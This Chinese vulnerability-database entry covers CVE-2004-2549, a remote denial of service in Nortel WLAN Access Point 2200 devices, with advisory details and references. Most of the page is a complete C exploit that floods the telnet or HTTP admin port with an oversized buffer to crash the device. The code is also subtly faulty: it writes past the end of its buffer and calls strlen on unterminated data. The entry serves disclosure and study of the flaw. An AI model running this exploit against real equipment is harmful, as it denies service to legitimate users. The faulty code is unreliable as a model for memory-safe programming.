Nortel Wireless LAN Access Point 2200系列远程拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107765 漏洞类型 边界条件错误
发布时间 2004-03-02 更新时间 2006-01-24
CVE编号 CVE-2004-2549 CNNVD-ID CNNVD-200412-190
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23786
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-190
|漏洞详情
NortelWirelessLANAccessPoint2200系列是无线接入设备。NortelWirelessLANAccessPoint2200系列在处理超大网络请求时处理不正确,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。LANAP2200允许客户端服务器之间的任意通信,LAN使用默认23和80口进行管理。攻击者提交超大网络请求给无线LAN访问接入设备的默认管理服务进行处理,可导致无线接入服务崩溃,停止对其他正常用户的响应。
|漏洞EXP
source: http://www.securityfocus.com/bid/9787/info

Nortel Wireless LAN Access Point 2200 series appliances have been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when a large network request is handled by one of the Wireless LAN Access Point default administration services. This will reportedly cause the Access Point Appliance Operating service to crash, effectively denying service to legitimate users.

/* WLAN-DoS.c
 *
 * Nortel Networks Wireless LAN Access Point 2200 DoS + PoC
 * discovered by Alex Hernandez.
 *
 * Copyright (C) 2004  Alex Hernandez.
 *
 * A successful attack on a vulnerable server can cause the AP
 * (Access Point) listener to fail and crash. The port 23 (telnet)
 * functionality cannot be restored until the listener is manually restarted.
 *
 * LAN AP 2200 permits client-server communication across any network.
 * LAN enables by default the port 23 (telnet) and port (80) for administering.
 * Debugging features are enabled by default, if LAN AP encounters such a request,
 * it will crash and no longer field AP requests from authorized clients.
 *
 * Simple lame code by
 *
 * -Mark Ludwik :Germany
 *
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
 if(argc < 3) {
  printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");
  printf("Usage: WlanDoS [AP/Host] [port]\n\n");
  exit(-1);
 }

 int sock;
 char explbuf[2024];
 struct sockaddr_in dest;
 struct hostent *he;

 if((he = gethostbyname(argv[1])) == NULL) {
  printf("Couldn't resolve %s!\n", argv[1]);
  exit(-1);
 }

 if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  perror("socket()");
  exit(-1);
 }

 printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");

 dest.sin_addr = *((struct in_addr *)he->h_addr);
 dest.sin_port = htons(atoi(argv[2]));
 dest.sin_family = AF_INET;

 printf("[+] Exploit buffer.\n");
 memset(explbuf, 'A', 2024);
 memcpy(explbuf+2024, "\n\n\n\n\n\n\n\n", 8);

 if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
  perror("connect()");
  exit(-1);
 }

 printf("[+] Connected...\n");
 printf("[+] Sending DoS attack...!\n");

 send(sock, explbuf, strlen(explbuf), 0);
 sleep(2);
 close(sock);
 printf("\n[+] Crash was successful !\n");
 return(0);
}
|参考资料

来源:XF
名称:nortel-accesspoint-telnet-dos(15373)
链接:http://xforce.iss.net/xforce/xfdb/15373
来源:www116.nortelnetworks.com
链接:http://www116.nortelnetworks.com/docs/bvdoc/wlan/216109a.pdf
来源:BID
名称:9787
链接:http://www.securityfocus.com/bid/9787
来源:OSVDB
名称:4128
链接:http://www.osvdb.org/4128
来源:SECTRACK
名称:1009294
链接:http://securitytracker.com/id?1009294
来源:SECUNIA
名称:11034
链接:http://secunia.com/advisories/11034
来源:FULLDISC
名称:20040301NortelNetworksWirelessLANAccessPoint2200DoS+PoC
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-03/0055.html
来源:NSFOCUS
名称:6119
链接:http://www.nsfocus.net/vulndb/6119